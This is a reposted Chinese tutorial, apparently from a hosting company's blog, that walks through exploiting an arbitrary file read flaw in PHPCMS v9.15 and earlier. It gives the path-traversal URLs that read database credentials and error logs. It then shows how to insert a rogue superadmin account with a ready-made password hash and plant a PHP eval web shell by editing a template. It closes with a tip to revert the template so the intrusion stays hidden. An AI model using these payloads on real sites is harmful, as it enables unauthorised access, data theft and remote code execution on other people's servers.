phpcmsv9.15以下任意文件读取漏洞

发布时间:2020-07-10 17:52:19 作者:KBK影院
来源:网络 阅读:1894

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/configs/database.php

成功读取数据库信息如下:
phpcmsv9.15以下任意文件读取漏洞 

爆网站路径:

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/error_log.php



phpcmsv9.15以下任意文件读取漏洞 


打开phpcmsV9数据库并且找到admin表,向表中添加一条数据,因为我们没法破解他的密码那么咱们就自己

添加一个用户以便能够登录后台操作:

Username:admin password: 748b4dfa3a7159c1eb1baa46f222f9b8 roleid:1 encrypt:C6mB9p

注意这几项必须添负责登录不了的。应为这条记录的意思是添加用户名为admin,密码为:creturn.com的超级管理员



phpcmsv9.15以下任意文件读取漏洞 

后台登录地址:localhost/index.php?m=admin

用户名:admin 密码:creturn.com

登录后台后我们找到界面-》模版风格-》选择默认模版点击详情列表


phpcmsv9.15以下任意文件读取漏洞 

然后点击里面的search目录下面的index.html右侧的编辑

phpcmsv9.15以下任意文件读取漏洞 

修改其模版为:

  1. <?php $shell = '<?php @eval($_POST[cmd]);?>';file_put_contents('shell.php',$shell);?>

复制代码

提交保存

然后访问:localhost/index.php?m=search

会在根目录生成一个shell.php的一句话,我们连接看看


phpcmsv9.15以下任意文件读取漏洞 

可以看到已经拿到shell,记得把修改的模版改回去。

或者可以直接通过mysql数据库及爆出的路径写一句话

推荐阅读:
  1. TEC-004-php文件下载任意文件读取漏洞修复
  2. 任意文件读取与下载

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

phpcms

上一篇:springboot windows10风格 activiti 整合项目框架源码 shiro 安全框

下一篇:joomla 3.x 创建简单的模块

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》